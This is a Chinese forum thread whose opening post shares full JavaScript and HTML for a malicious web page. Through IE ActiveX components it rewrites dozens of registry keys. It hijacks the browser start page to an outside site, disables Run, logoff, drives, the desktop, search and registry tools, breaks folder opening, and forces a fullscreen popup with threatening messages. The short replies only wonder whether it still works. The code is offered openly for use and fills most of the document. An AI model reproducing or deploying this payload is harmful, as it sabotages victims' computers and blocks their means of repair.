返回列表 回复 发帖

一个破坏计算机正常使用的恶意代码[惧用!!!]

<script language=javascript>
<!--
var Words ="<meta http-equiv="Content-Language" content="zh-cn">
<script>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>";
document.write("<h1>世上本无情,庸人自饶之。。。。。</h1>";
function f()
{
try
{
//ActiveX initialization
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}";
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}";
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}";
a1.createInstance();
Net = a1.GetObject();

try
{
//set home page
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://ok989.ok999.net";
//end set home page

//Write Regedit
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun", 01, "REG_BINARY";

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoClose", 01, "REG_BINARY";

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoLogOff", 01, "REG_BINARY";

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDrives", "67108863", "REG_DWORD";

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistryTools", "00000001", "REG_DWORD");

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDesktop","00000001","REG_DWORD");

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\Disabled", "00000001", "REG_DWORD");

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\NoRealMode", "00000001", "REG_DWORD");

Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeCaption", "★魔界鬼域★");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeText", "★天地无情。死不瞑目★");

Shl.RegWrite ("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\\SchedulingAgent","","REG_SZ");
Shl.RegWrite ("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoSaveSettings",00,"REG_BINARY");
Shl.RegWrite ("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoViewContextMenu",01,"REG_BINARY");
Shl.RegWrite ("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoTrayContextMenu",01,"REG_BINARY");
Shl.RegWrite ("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\ScanRegistry","","REG_SZ");
Shl.RegWrite ("HKEY_CLASSES_ROOT\\Folder\\shell\\open\\ddeexec\\","rem [ViewFolder(%l, %I, %S)]","REG_SZ");
Shl.RegWrite ("HKEY_CLASSES_ROOT\\Folder\\shell\\explore\\ddeexec\\","rem [ViewFolder(%l, %I, %S)]","REG_SZ");
Shl.RegWrite ("HKEY_CLASSES_ROOT\\CLSID\\{01E04581-4EEE-11d0-BFE9-00AA005B4383}\\InProcServer32\\","C:\\Windows\\System\\Browseui.dll-","REG_SZ");
Shl.RegWrite ("HKEY_LOCAL_MACHINE\\Software\\CLASSES\\.inf\\","txtfile","REG_SZ");
Shl.RegWrite ("HKEY_LOCAL_MACHINE\\Software\\CLASSES\\.reg\\","txtfile","REG_SZ");
Shl.RegWrite ("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\RestrictRun","00000001", "REG_DWORD");
Shl.RegWrite ("HKEY_LOCAL_MACHINE\\Enum\\PCI\\ChannelOptions",02,"REG_BINARY");
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Restrictions\\NoBrowserClose","01", "REG_DWORD");
Shl.RegWrite ("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\NoDevMgrPage","00000001", "REG_DWORD");

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoSetFolders","01000000","REG_DWORD");

Shl.RegWrite ("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoFind", "00000001", "REG_DWORD");

Shl.RegWrite ("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoFavoritesMenu", "00000001", "REG_DWORD");

Shl.RegWrite ("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRecentDocsMenu", "00000001", "REG_DWORD");

Shl.RegWrite ("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoSetTaskbar", "00000001", "REG_DWORD");

Shl.RegWrite ("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\RestrictRun","00000001", "REG_DWORD");
Shl.RegWrite ("HKEY_CURRENT_USER\\Control Panel\\International\\stimeformat","HH:mm:ss tt","REG_SZ");
Shl.RegWrite ("HKEY_CURRENT_USER\\Control Panel\\International\\s1159","★绝情魔界★","REG_SZ");
Shl.RegWrite ("HKEY_CURRENT_USER\\Control Panel\\International\\s2359","★绝情魔界★","REG_SZ");

//end Write Regedit
document.write("<body bgcolor=''#FF0000''>");
document.write("<h1>天地无情。死不瞑目</h1>");
}
catch(e)
{
document.write("<body bgcolor=''#FF0000''>");
document.write("<h1>天地无情。死不瞑目!</h1>");
}
}
catch(e)
{
document.write("<body bgcolor=''#FF0000''>");
document.write("<h1>天地无情。死不瞑目</h1>");
}
}

function clean()
{
setTimeout("f()", 1000);
}

clean();
</script>
<SCRIPT LANGUAGE="JavaScript">
<!-- Begin
if (this.name!=''fullscreen''){
window.open(location.href,''fullscreen'',''fullscreen,scrollbars'')
}
// End -->
</script>

<body bgcolor="#FF0000">
<p><b><font size="7" face="华文彩云">         
</font></b></p>
<p><b><font face="华文彩云" size="7">         
抽刀断水,水更流。</font></b></p>
<p><font face="华文彩云"><font size="7"><b>         
举杯消愁,愁更愁</b></font><b><font size="7">。</font></b></font></p>" //put your cripto code there
function SetNewWords()
{
var NewWords;
NewWords = unescape(Words);
document.write(NewWords);
}
SetNewWords();
// -->
</script>

Re:一个破坏计算机正常使用的恶意代码[惧用!!!]

对高版本浏览器跟操作系统无效吧?

Re:一个破坏计算机正常使用的恶意代码[惧用!!!]

你把这段代码放到HTML里试一下不就知道了!

不过我相信紫琪,我不敢试
佛对我说:你的心上有尘。我用力地擦拭。 佛说:你错了,尘是擦不掉的。我于是将心剥了下来。 佛又说:你又错了,尘本非尘,何来有尘。 我悟了。

Re:一个破坏计算机正常使用的恶意代码[惧用!!!]

呵呵!挺可怕的呀
返回列表